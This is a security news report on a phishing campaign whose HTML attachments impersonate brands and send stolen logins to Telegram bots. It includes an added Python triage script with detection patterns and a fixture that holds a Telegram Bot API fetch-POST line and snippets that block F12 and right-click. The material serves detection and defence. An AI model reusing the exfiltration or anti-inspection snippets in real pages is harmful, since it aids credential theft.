A sophisticated phishing campaign is currently targeting organizations throughout Central and Eastern Europe, employing deceptive tactics to steal user login credentials. This latest threat, identified by security analysts, impersonates well-known global brands such as Microsoft 365, Adobe, WeTransfer, FedEx, and DHL. The campaign’s efficacy stems from its novel delivery method, utilizing self-contained HTML files as email attachments, thereby bypassing traditional security measures that often flag suspicious URLs or external server dependencies. The focus on these specific brands and the operational nuances observed suggest a calculated approach aimed at exploiting regional business practices.
The threat actors behind this operation are distributing phishing emails that convincingly mimic communications from legitimate customers or business partners. These emails often request quotations or invoice confirmations, using RFQ-style filenames like RFQ_4460-INQUIRY.HTML to appear authentic. This targeted strategy is designed to ensnare businesses operating in sectors with regular procurement workflows, including agriculture, automotive, construction, and education. The primary affected regions currently include the Czech Republic, Slovakia, Hungary, and Germany, according to findings from Cyble security analysts.
Campaign Overview and Methodology
Cyble security analysts have detailed how this sophisticated phishing campaign achieves its success through embedded JavaScript within HTML attachments. This code captures sensitive login credentials, including email addresses and passwords, along with technical data like IP addresses and user-agent information. Crucially, instead of relying on traditional command-and-control servers, the stolen data is transmitted directly to attacker-controlled Telegram bots. This innovative exfiltration method circumvents many common security monitoring tools.
Upon execution, victims are presented with highly convincing fake login pages that meticulously replicate the branding and interface of legitimate services. Blurred background images and authentic brand elements are employed to enhance the illusion of legitimacy, making it difficult for users to discern the fraudulent nature of the pages. The campaign has demonstrated a clear understanding of how to create a seamless user experience that can effectively bypass conventional email security controls and trick unsuspecting employees.
The credential capture mechanism is technically implemented by reading the values entered into form fields on the fake login pages. These captured details are then packaged into API requests and sent directly to Telegram bots via the Telegram Bot API. Technical analysis has revealed at least two distinct implementation strategies among the analyzed samples. The first variant implements CryptoJS AES encryption to obfuscate the captured data before transmitting it. This method also redirects victims to legitimate company domains to further mask the malicious activity.
In contrast, a second sample exhibits more advanced anti-forensics techniques. This variant actively blocks certain keyboard combinations, such as F12, Ctrl+U/S/C/A/X, and right-click context menus. These measures are designed to prevent security researchers or analysis tools from inspecting or deciphering the underlying malicious code, adding a layer of difficulty for threat intelligence gathering.
The exfiltration function itself demonstrates a high degree of technical sophistication. Instead of relying on less efficient methods like jQuery dependencies, the attackers utilize the native Fetch API for cleaner and more direct code implementation. The JavaScript constructs POST requests containing the harvested credentials. These requests are sent via HTTPS to specific `api.telegram.org/bot` endpoints. The critical bot tokens and chat IDs required for this communication are embedded directly within the payload, avoiding the need for external configuration files or suspicious network patterns.
This deliberate avoidance of easily detectable network traffic, coupled with the decentralized infrastructure of Telegram bots, contributes to the campaign’s operational resilience. The strategy ensures that even if one bot is identified and taken down, the entire operation is unlikely to be compromised. The current focus on Central and Eastern Europe and the specific industries targeted indicates a well-researched and strategic operation by the threat actors.
Recommendations and Future Outlook
Given the nature of this threat, organizations are strongly advised to prioritize the deployment of robust HTML attachment controls. Implementing content inspection policies to block or sandbox potentially malicious HTML files before they reach end-users is a critical first step. Security teams should also actively hunt for any `api.telegram.org` POST activity originating from internal client systems. Conducting retroactive threat hunts for identified indicators of compromise (IOCs) is essential to assess the extent of any credential compromise and identify affected accounts.
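As an added defender-side example (not code from the article or the Cyble report), the script below statically triages an HTML attachment for the traits described above: a Telegram Bot API endpoint, a Fetch POST, CryptoJS AES, context-menu and F12 blocking, a password field, and an impersonated brand name. The indicator weights, thresholds and the two sample attachments are constructed assumptions; the "suspicious" fixture carries only a placeholder token and no capture logic.

```python
import re
from typing import Dict, List, Tuple

# Indicator name, regex, weight. The weights and thresholds are assumed
# values for this example, not figures from the Cyble report.
INDICATORS: List[Tuple[str, str, int]] = [
    ("telegram_bot_api", r"api\.telegram\.org/bot", 5),
    ("telegram_sendmessage", r"/sendMessage", 2),
    ("fetch_call", r"\bfetch\s*\(", 1),
    ("post_method", r"method\s*:\s*['\"]POST['\"]", 1),
    ("cryptojs_aes", r"CryptoJS\.AES", 2),
    ("context_menu_block", r"['\"]contextmenu['\"]", 2),
    ("devtools_key_block", r"keyCode\s*===?\s*123|['\"]F12['\"]", 2),
    ("password_field", r"type\s*=\s*['\"]password['\"]", 1),
    ("brand_lure", r"Microsoft 365|Adobe|WeTransfer|FedEx|DHL", 1),
]
BLOCK_THRESHOLD = 7
SANDBOX_THRESHOLD = 3


def triage_html(html: str) -> Dict[str, object]:
    """Score an HTML attachment without rendering or executing it."""
    hits: List[str] = []
    score = 0
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, html, re.IGNORECASE):
            hits.append(name)
            score += weight
    if score >= BLOCK_THRESHOLD:
        verdict = "block"
    elif score >= SANDBOX_THRESHOLD:
        verdict = "sandbox"
    else:
        verdict = "allow"
    return {"score": score, "indicators": hits, "verdict": verdict}


# Constructed fixtures: the first only contains the indicator strings (placeholder
# token, no real capture logic); the second is a plain marketing mail.
SUSPICIOUS_ATTACHMENT = """<html><head><title>Microsoft 365 - Sign in</title></head><body>
<form><input type="email"><input type="password"></form>
<script>
document.addEventListener('contextmenu', e => e.preventDefault());
document.addEventListener('keydown', e => { if (e.keyCode === 123) e.preventDefault(); });
fetch('https://api.telegram.org/bot<PLACEHOLDER_TOKEN>/sendMessage', {method: 'POST'});
</script></body></html>"""
BENIGN_ATTACHMENT = "<html><body><p>Monthly newsletter</p><a href='https://example.com'>Read more</a></body></html>"

if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        print(label, triage_html(doc))
```

A "sandbox" verdict is meant to route the file to detonation rather than delivery; a "block" verdict is a candidate for quarantine and a retroactive hunt for `api.telegram.org` POSTs from the recipient's host.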
The ongoing evolution of phishing techniques, particularly those leveraging increasingly sophisticated delivery mechanisms like self-contained HTML files, necessitates continuous vigilance and adaptation of security postures. The effectiveness of this campaign underscores the importance of user education and awareness training in recognizing and reporting suspicious communications. As threat actors refine their methods, security professionals must remain informed about emerging attack vectors and proactively implement defensive strategies to protect organizational assets and sensitive data.